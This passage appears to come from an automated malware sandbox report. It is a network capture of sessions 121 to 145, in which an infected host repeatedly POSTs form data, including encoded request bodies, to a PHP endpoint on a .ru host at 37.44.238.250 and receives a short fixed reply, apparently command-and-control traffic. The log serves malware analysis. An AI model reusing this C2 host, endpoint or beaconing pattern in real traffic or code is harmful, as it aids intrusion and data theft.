                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:09.165200949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:09.242007017 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    121 | 192.168.2.4 | 50129 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:08.441555977 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:09.245186090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:09.320733070 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    122 | 192.168.2.4 | 50130 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:09.540478945 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:10.352097988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:10.428319931 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    123 | 192.168.2.4 | 50131 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:10.558006048 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:11.376306057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:11.453664064 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    124 | 192.168.2.4 | 50132 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:11.581404924 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:12.392910957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:12.473086119 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    125 | 192.168.2.4 | 50133 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:12.595108986 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:13.404814005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:13.476664066 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    126 | 192.168.2.4 | 50134 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:13.601519108 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    127 | 192.168.2.4 | 50135 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:14.281761885 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:15.093873024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:15.173933029 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    128 | 192.168.2.4 | 50136 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:14.385215044 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:15.226516008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:15.306854010 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    129 | 192.168.2.4 | 50137 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:15.443428040 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:16.254158974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:16.331206083 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    130 | 192.168.2.4 | 50138 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:16.454763889 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:17.265634060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:17.343631983 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    131 | 192.168.2.4 | 50139 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:17.474858046 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:18.991398096 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:18.991413116 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:18.991425037 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:18.991436958 CET | 183 | IN | HTTP/1.1 100 Continue
                                                                    Data Ascii: HTTP/1.1 200 OK Server: nginx Date: Wed, 06 Nov 2024 02:39:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    132 | 192.168.2.4 | 50140 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:19.119432926 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:19.469599009 CET | 1008 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:19.929331064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:20.002082109 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    133 | 192.168.2.4 | 50141 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:20.127691984 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    134 | 192.168.2.4 | 50142 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:20.195708036 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:20.547849894 CET | 1276 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:21.008579969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:21.085596085 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    135 | 192.168.2.4 | 50143 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:20.313220978 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:20.657107115 CET | 1012 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:21.138801098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:21.208465099 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    136 | 192.168.2.4 | 50144 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:21.344024897 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:21.688318014 CET | 1012 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:22.162271023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:22.241113901 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    137 | 192.168.2.4 | 50145 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:22.367409945 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:22.719623089 CET | 1012 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:23.208024979 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:23.283559084 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    138 | 192.168.2.4 | 50146 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:23.411006927 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:23.766638041 CET | 1008 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:24.212655067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:24.284620047 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    139 | 192.168.2.4 | 50147 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:24.408421993 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:24.766494036 CET | 1008 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:25.253020048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:25.327613115 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    140 | 192.168.2.4 | 50148 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:25.463128090 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:25.813399076 CET | 1012 | OUT | Data (request body)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    141 | 192.168.2.4 | 50149 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:26.100739002 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:26.455411911 CET | 1260 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:26.907964945 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:26.982861996 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    142 | 192.168.2.4 | 50150 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:26.271538973 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:26.625874043 CET | 1012 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:27.086781025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:27.155023098 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    143 | 192.168.2.4 | 50151 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:27.288026094 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:27.641611099 CET | 1012 | OUT | Data (request body)
                                                                    Nov 6, 2024 03:39:28.098757029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:28.166906118 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    144 | 192.168.2.4 | 50152 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:28.299556971 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:28.659455061 CET1012OUTData Raw: 56 50 5f 5e 53 5c 50 5c 5a 5f 52 51 54 58 5b 5f 55 5d 59 5b 51 5e 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_^S\P\Z_RQTX[_U]Y[Q^R^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/=8<]()\6)[&'+([ <"V)-+[.3#792'X$.Q-.
                                                                    Nov 6, 2024 03:39:29.146776915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:29.219271898 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    145 | 192.168.2.4 | 50153 | 37.44.238.250 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:39:29.371623039 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:29.719603062 CET1012OUTData Raw: 53 52 5a 58 53 5f 50 5f 5a 5f 52 51 54 53 5b 53 55 51 59 58 51 57 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZXS_P_Z_RQTS[SUQYXQWR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8)+4\?4=*![=-'/"?<>+X,&'4')&)'X$.Q-
                                                                    Nov 6, 2024 03:39:30.174763918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:30.253245115 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


